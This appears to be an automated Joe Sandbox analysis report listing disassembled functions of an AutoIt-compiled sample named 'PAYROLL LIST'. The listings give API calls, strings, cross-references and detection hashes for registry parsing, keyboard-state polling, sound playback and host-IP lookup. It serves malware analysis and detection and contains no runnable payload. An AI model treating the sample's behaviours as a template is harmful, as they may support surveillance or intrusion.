Function 00A83C06 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 109COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,00A82BB5,?,?), ref: 00A83C1D

Strings

HKCC, xrefs: 00A83CD1
HKEY_CURRENT_CONFIG, xrefs: 00A83CC0
HKLM, xrefs: 00A83C81
HKEY_CURRENT_USER, xrefs: 00A83CE2
HKEY_LOCAL_MACHINE, xrefs: 00A83C6C
HKCR, xrefs: 00A83CAB
HKU, xrefs: 00A83D15
HKEY_USERS, xrefs: 00A83D04
HKCU, xrefs: 00A83CF3
HKEY_CLASSES_ROOT, xrefs: 00A83C96

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-909552448
Opcode ID: 52c94e0e77f26cca1a1121968e1f87a2436c19780af45a4259233528198379e5
Instruction ID: 106d84f646fb8e415416443c2427380a4ddd9207789d724cf6fd3fb1e34a807c
Opcode Fuzzy Hash: 52c94e0e77f26cca1a1121968e1f87a2436c19780af45a4259233528198379e5
Instruction Fuzzy Hash: 1341303111024A9BDF04FF14E951AEF3765BF56740F505869FCA62B292EB70AE0ACB50

Function 00A625B5 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00A936F4,00000010,?,Bad directive syntax error,00ABDC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 00A625D6
LoadStringW.USER32(00000000,?,00A936F4,00000010), ref: 00A625DD
_wprintf.LIBCMT ref: 00A62610
__swprintf.LIBCMT ref: 00A62632
MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00A626A1

Strings

%s (%d) : ==> %s.: %s %s, xrefs: 00A6260B
Line %d (File "%s"):, xrefs: 00A62647
Line %d:, xrefs: 00A6262C
., xrefs: 00A62687
Error: , xrefs: 00A6266F

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: HandleLoadMessageModuleString__swprintf_wprintf
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 1080873982-4153970271
Opcode ID: 958ce151bb483b42cd52cf21f0091cc83f130d9e6fcba58529c094613d14dc19
Instruction ID: 3195a27fe91cfc9f8a38f7b8866893a766334be0d81822d695b84b48a91a1d88
Opcode Fuzzy Hash: 958ce151bb483b42cd52cf21f0091cc83f130d9e6fcba58529c094613d14dc19
Instruction Fuzzy Hash: 3A214D32C0022ABFDF11BB90DD4AEEE7B39FF19304F000466F506661A2EB71A665DB51

Function 00A67AD9 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 73COMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00A67B42
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00A67B58
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00A67B69
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00A67B7B
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00A67B8C

Strings

close PlayMe, xrefs: 00A67B53, 00A67B80
play PlayMe, xrefs: 00A67B87
play PlayMe wait, xrefs: 00A67B76
open , xrefs: 00A67AF1
status PlayMe mode, xrefs: 00A67B3D
alias PlayMe, xrefs: 00A67B1B

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: SendString
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 890592661-1007645807
Opcode ID: c5414a24c8845f927aba5f3f59dfedbd03dd4711b2a6508779353e579de73071
Instruction ID: f41fc9d69a0bd8bd5dc70e2e7c6c741e6160ae90165c01fb612a105672e8296c
Opcode Fuzzy Hash: c5414a24c8845f927aba5f3f59dfedbd03dd4711b2a6508779353e579de73071
Instruction Fuzzy Hash: 5F11C4B1A5026979DB20F765DD4ADFFBB7CFB91B10F00092A7413A31D1DA600A45C5B1

Function 00A6778F Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00A67794

Part of subcall function 00A3DC38: timeGetTime.WINMM(?,7694B400,00A958AB), ref: 00A3DC3C

Sleep.KERNEL32(0000000A), ref: 00A677C0
EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 00A677E4
FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00A67806
SetActiveWindow.USER32 ref: 00A67825
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00A67833
SendMessageW.USER32(00000010,00000000,00000000), ref: 00A67852
Sleep.KERNEL32(000000FA), ref: 00A6785D
IsWindow.USER32 ref: 00A67869
EndDialog.USER32(00000000), ref: 00A6787A

Strings

BUTTON, xrefs: 00A677F8

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: e382989961c7e4037126b48661574a17326f76c8ea2112f8fd7e046f5dee29d6
Instruction ID: c4364014daaed62024db6068e086887c4053ab23907b3fda04ba402cd3206a47
Opcode Fuzzy Hash: e382989961c7e4037126b48661574a17326f76c8ea2112f8fd7e046f5dee29d6
Instruction Fuzzy Hash: 27214CB2224246AFEB01DBA0ECCDE2A3B7AFB05348F040054F5469B5A2CB618C42DB20

Function 00A702EE Relevance: 18.3, APIs: 12, Instructions: 282comCOMMON

Download Yara Rule

APIs

Part of subcall function 00A2936C: __swprintf.LIBCMT ref: 00A293AB
Part of subcall function 00A2936C: __itow.LIBCMT ref: 00A293DF

CoInitialize.OLE32(00000000), ref: 00A7034B
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00A703DE
SHGetDesktopFolder.SHELL32(?), ref: 00A703F2
CoCreateInstance.OLE32(00AADA8C,00000000,00000001,00AD3CF8,?), ref: 00A7043E
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00A704AD
CoTaskMemFree.OLE32(?,?), ref: 00A70505
_memset.LIBCMT ref: 00A70542
SHBrowseForFolderW.SHELL32(?), ref: 00A7057E
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00A705A1
CoTaskMemFree.OLE32(00000000), ref: 00A705A8
CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00A705DF
CoUninitialize.OLE32(00000001,00000000), ref: 00A705E1

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
String ID:
API String ID: 1246142700-0
Opcode ID: 9f68e98717e1936d9692e275fba703ec7cd9e35b2247dc2e3e67a609ecae7b72
Instruction ID: e5bccad455d07484cd8dd4db310267605d8ce13a7a3ebeb46cb25b3b936639df
Opcode Fuzzy Hash: 9f68e98717e1936d9692e275fba703ec7cd9e35b2247dc2e3e67a609ecae7b72
Instruction Fuzzy Hash: C4B1D975A00219EFDB04DFA8C988DAEBBB9FF49314B148469F90AEB251D730ED45CB50

Function 00A62E5B Relevance: 18.2, APIs: 12, Instructions: 185keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00A62ED6
SetKeyboardState.USER32(?), ref: 00A62F41
GetAsyncKeyState.USER32(000000A0), ref: 00A62F61
GetKeyState.USER32(000000A0), ref: 00A62F78
GetAsyncKeyState.USER32(000000A1), ref: 00A62FA7
GetKeyState.USER32(000000A1), ref: 00A62FB8
GetAsyncKeyState.USER32(00000011), ref: 00A62FE4
GetKeyState.USER32(00000011), ref: 00A62FF2
GetAsyncKeyState.USER32(00000012), ref: 00A6301B
GetKeyState.USER32(00000012), ref: 00A63029
GetAsyncKeyState.USER32(0000005B), ref: 00A63052
GetKeyState.USER32(0000005B), ref: 00A63060

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 07b779ea870954519683b32eead5cf6268eed5d76e17b0abb25cfe03362320a8
Instruction ID: 9c916a2aa5daeae4b7eb2df278f58d98bd1ad823224c3d992982223bc521727a
Opcode Fuzzy Hash: 07b779ea870954519683b32eead5cf6268eed5d76e17b0abb25cfe03362320a8
Instruction Fuzzy Hash: C951F961A08B8429FF35DBB489107EABFF49F12380F08459DC5C2575C2DB949B8CC7A2

Function 00A5ED02 Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 00A5ED1E
GetWindowRect.USER32(00000000,?), ref: 00A5ED30
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00A5ED8E
GetDlgItem.USER32(?,00000002), ref: 00A5ED99
GetWindowRect.USER32(00000000,?), ref: 00A5EDAB
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00A5EE01
GetDlgItem.USER32(?,000003E9), ref: 00A5EE0F
GetWindowRect.USER32(00000000,?), ref: 00A5EE20
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00A5EE63
GetDlgItem.USER32(?,000003EA), ref: 00A5EE71
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00A5EE8E
InvalidateRect.USER32(?,00000000,00000001), ref: 00A5EE9B

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 414521a406dbc5c2168570cf4fef98d1d9b689b99cf1163b72fa133cf8bda473
Instruction ID: e00dc91397f553812f8802b92bb33061b0f6e0172ff4cca8bf9a65d4014d4880
Opcode Fuzzy Hash: 414521a406dbc5c2168570cf4fef98d1d9b689b99cf1163b72fa133cf8bda473
Instruction Fuzzy Hash: AB510471B10205AFDB18CFA9DD85AAEBBB6FB89701F148129F91AD72D0D7709E058B10

Function 00A3B73E Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00A3B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00A3B759,?,00000000,?,?,?,?,00A3B72B,00000000,?), ref: 00A3BA58

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00A3B72B), ref: 00A3B7F6
KillTimer.USER32(00000000,?,00000000,?,?,?,?,00A3B72B,00000000,?,?,00A3B2EF,?,?), ref: 00A3B88D
DestroyAcceleratorTable.USER32(00000000), ref: 00A9D8A6
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00A3B72B,00000000,?,?,00A3B2EF,?,?), ref: 00A9D8D7
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00A3B72B,00000000,?,?,00A3B2EF,?,?), ref: 00A9D8EE
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00A3B72B,00000000,?,?,00A3B2EF,?,?), ref: 00A9D90A
DeleteObject.GDI32(00000000), ref: 00A9D91C

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: b48a99d9ceebdf7d6047151287666a809d9896f1c90a33ebf54d05c526352639
Instruction ID: 135d20e7d9d6bb701fc4828d9d2c1e972b81467d4cc9e7b2da00eea2fd99cc83
Opcode Fuzzy Hash: b48a99d9ceebdf7d6047151287666a809d9896f1c90a33ebf54d05c526352639
Instruction Fuzzy Hash: 28619D30611651DFDB25DF58D988B65B7F6FF95311F14451DF2828AAB0C730A8C2CBA0

Function 00A3B40A Relevance: 18.1, APIs: 12, Instructions: 131COMMON

Download Yara Rule

APIs

Part of subcall function 00A3B526: GetWindowLongW.USER32(?,000000EB), ref: 00A3B537

GetSysColor.USER32(0000000F), ref: 00A3B438

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: e646c4a3b091212eb6ddece226abb50b32ba41f4bb3b700936a2b17deb8e4c8d
Instruction ID: 9945bd188309ee60994c0963d2b277643316e8bfb15f773ce097c966582da818
Opcode Fuzzy Hash: e646c4a3b091212eb6ddece226abb50b32ba41f4bb3b700936a2b17deb8e4c8d
Instruction Fuzzy Hash: 8741C230110154AFDF249F68DC89BB93B66AB06730F184365FEA68E5E6D7318C82D735

Function 00A6690B Relevance: 18.1, APIs: 12, Instructions: 113COMMON

Download Yara Rule

APIs

_wcschr.LIBCMT ref: 00A66923
_wcscpy.LIBCMT ref: 00A66934
__wsplitpath.LIBCMT ref: 00A66958
__wsplitpath.LIBCMT ref: 00A66979
_wcscpy.LIBCMT ref: 00A6699B
_wcscpy.LIBCMT ref: 00A669B9
_wcscpy.LIBCMT ref: 00A669C7
_wcscat.LIBCMT ref: 00A669D6
_wcscat.LIBCMT ref: 00A66A2B
_wcscat.LIBCMT ref: 00A66A61
_wcscat.LIBCMT ref: 00A66A73

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
String ID:
API String ID: 136442275-0
Opcode ID: 06f2d0f56301f20f087b915e22a93ee550a7925bd6d32c688679f37265c28525
Instruction ID: 22a2b8fcde97023386127c177a333b97eda14009e32e90a176909d72b8eb899e
Opcode Fuzzy Hash: 06f2d0f56301f20f087b915e22a93ee550a7925bd6d32c688679f37265c28525
Instruction Fuzzy Hash: 884110BB84511CAECF62DB94CD85DDF73BCEB84300F0041E6B659A2051EA71ABE98F50

Function 00A6D76A Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 180COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(00ABDC00,00ABDC00,00ABDC00), ref: 00A6D7CE
GetDriveTypeW.KERNEL32(?,00AD3A70,00000061), ref: 00A6D898
_wcscpy.LIBCMT ref: 00A6D8C2

Strings

cdrom, xrefs: 00A6D7EA
unknown, xrefs: 00A6D859
fixed, xrefs: 00A6D816
removable, xrefs: 00A6D800
ramdisk, xrefs: 00A6D842
network, xrefs: 00A6D82C
all, xrefs: 00A6D7D4

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: BuffCharDriveLowerType_wcscpy
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2820617543-1000479233
Opcode ID: ee7cdd788f12379989e6a7d6d1b80820c1bbfc3feee1d5117f3bc28a004e9d98
Instruction ID: 18bb02761b5f52aa0dc005fe9d069fe46dc9127cb54531cac1917d71ba8ee096
Opcode Fuzzy Hash: ee7cdd788f12379989e6a7d6d1b80820c1bbfc3feee1d5117f3bc28a004e9d98
Instruction Fuzzy Hash: 8F518335604340AFCB10EF14D992AAEB7B5FF94354F10892DF59A572A2DB31DD05CB82

Function 00A2936C Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 145COMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 00A293AB
__itow.LIBCMT ref: 00A293DF

Part of subcall function 00A41557: _xtow@16.LIBCMT ref: 00A41578

Strings

%.15g, xrefs: 00A293A5
False, xrefs: 00A94C93
True, xrefs: 00A94C8C
0x%p, xrefs: 00A94CAD

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: __itow__swprintf_xtow@16
String ID: %.15g$0x%p$False$True
API String ID: 1502193981-2263619337
Opcode ID: 8daa390d58d1ed3ee928bbe569ee3be9f52716a129550dd806eec6b21264e42d
Instruction ID: 93c341e1307a59d23b84c114f2f518c94289bd9ff6cd2ba5369f4f1bf1ef1784
Opcode Fuzzy Hash: 8daa390d58d1ed3ee928bbe569ee3be9f52716a129550dd806eec6b21264e42d
Instruction Fuzzy Hash: CA41B676A04214AFDF24DB78EA41E6A73F4EF48710F20447EF14AD7181EA31D942DB51

Function 00A8A1B6 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00A8A259
CreateCompatibleDC.GDI32(00000000), ref: 00A8A260
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00A8A273
SelectObject.GDI32(00000000,00000000), ref: 00A8A27B
GetPixel.GDI32(00000000,00000000,00000000), ref: 00A8A286
DeleteDC.GDI32(00000000), ref: 00A8A28F
GetWindowLongW.USER32(?,000000EC), ref: 00A8A299
SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00A8A2AD
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00A8A2B9

Strings

static, xrefs: 00A8A1F1

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: 8c7f30b21fa739f7ae8085f6c3ce90909e59c9e26dca4a118f4843961e22ec02
Instruction ID: f7f5220a549ae1ff39c3a4241dbbf5c197f9b9620c0af7b157a8d5ad627efefa
Opcode Fuzzy Hash: 8c7f30b21fa739f7ae8085f6c3ce90909e59c9e26dca4a118f4843961e22ec02
Instruction Fuzzy Hash: 5A316E31100215ABEF21AFA4DC49FDA3B69FF1A760F100215FA5AA61E0D735D812DB65

Function 00A66F02 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 72networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00A66F1D
gethostname.WSOCK32(?,00000100), ref: 00A66F37
gethostbyname.WSOCK32(?), ref: 00A66F44
_wcscpy.LIBCMT ref: 00A66F6C
inet_ntoa.WSOCK32(?), ref: 00A66F8A
_strcat.LIBCMT ref: 00A66F98
_wcscpy.LIBCMT ref: 00A66FAF
WSACleanup.WSOCK32 ref: 00A66FBD
_wcscpy.LIBCMT ref: 00A66FCB

Strings

0.0.0.0, xrefs: 00A66F66

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 2620052-3771769585
Opcode ID: a87a97902dddd8500f2a28fbb0c835d4d606f0ead85a87564ca6b90e2a67f58a
Instruction ID: bb5afc8110d3393d0380594fca59ff52317c142d3d00e2d1b700ec952e46b3a3
Opcode Fuzzy Hash: a87a97902dddd8500f2a28fbb0c835d4d606f0ead85a87564ca6b90e2a67f58a
Instruction Fuzzy Hash: 1A11D372904215BFDB24ABB0ED4AEDA77BCEF45710F000069F146A6091FF75DA858B51

Function 00A4500E Relevance: 16.8, APIs: 11, Instructions: 257COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00A45047

Part of subcall function 00A47C0E: __getptd_noexit.LIBCMT ref: 00A47C0E

__gmtime64_s.LIBCMT ref: 00A450E0
__gmtime64_s.LIBCMT ref: 00A45116
__gmtime64_s.LIBCMT ref: 00A45133
__allrem.LIBCMT ref: 00A45189
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A451A5
__allrem.LIBCMT ref: 00A451BC
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A451DA
__allrem.LIBCMT ref: 00A451F1
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A4520F
__invoke_watson.LIBCMT ref: 00A45280

Memory Dump Source

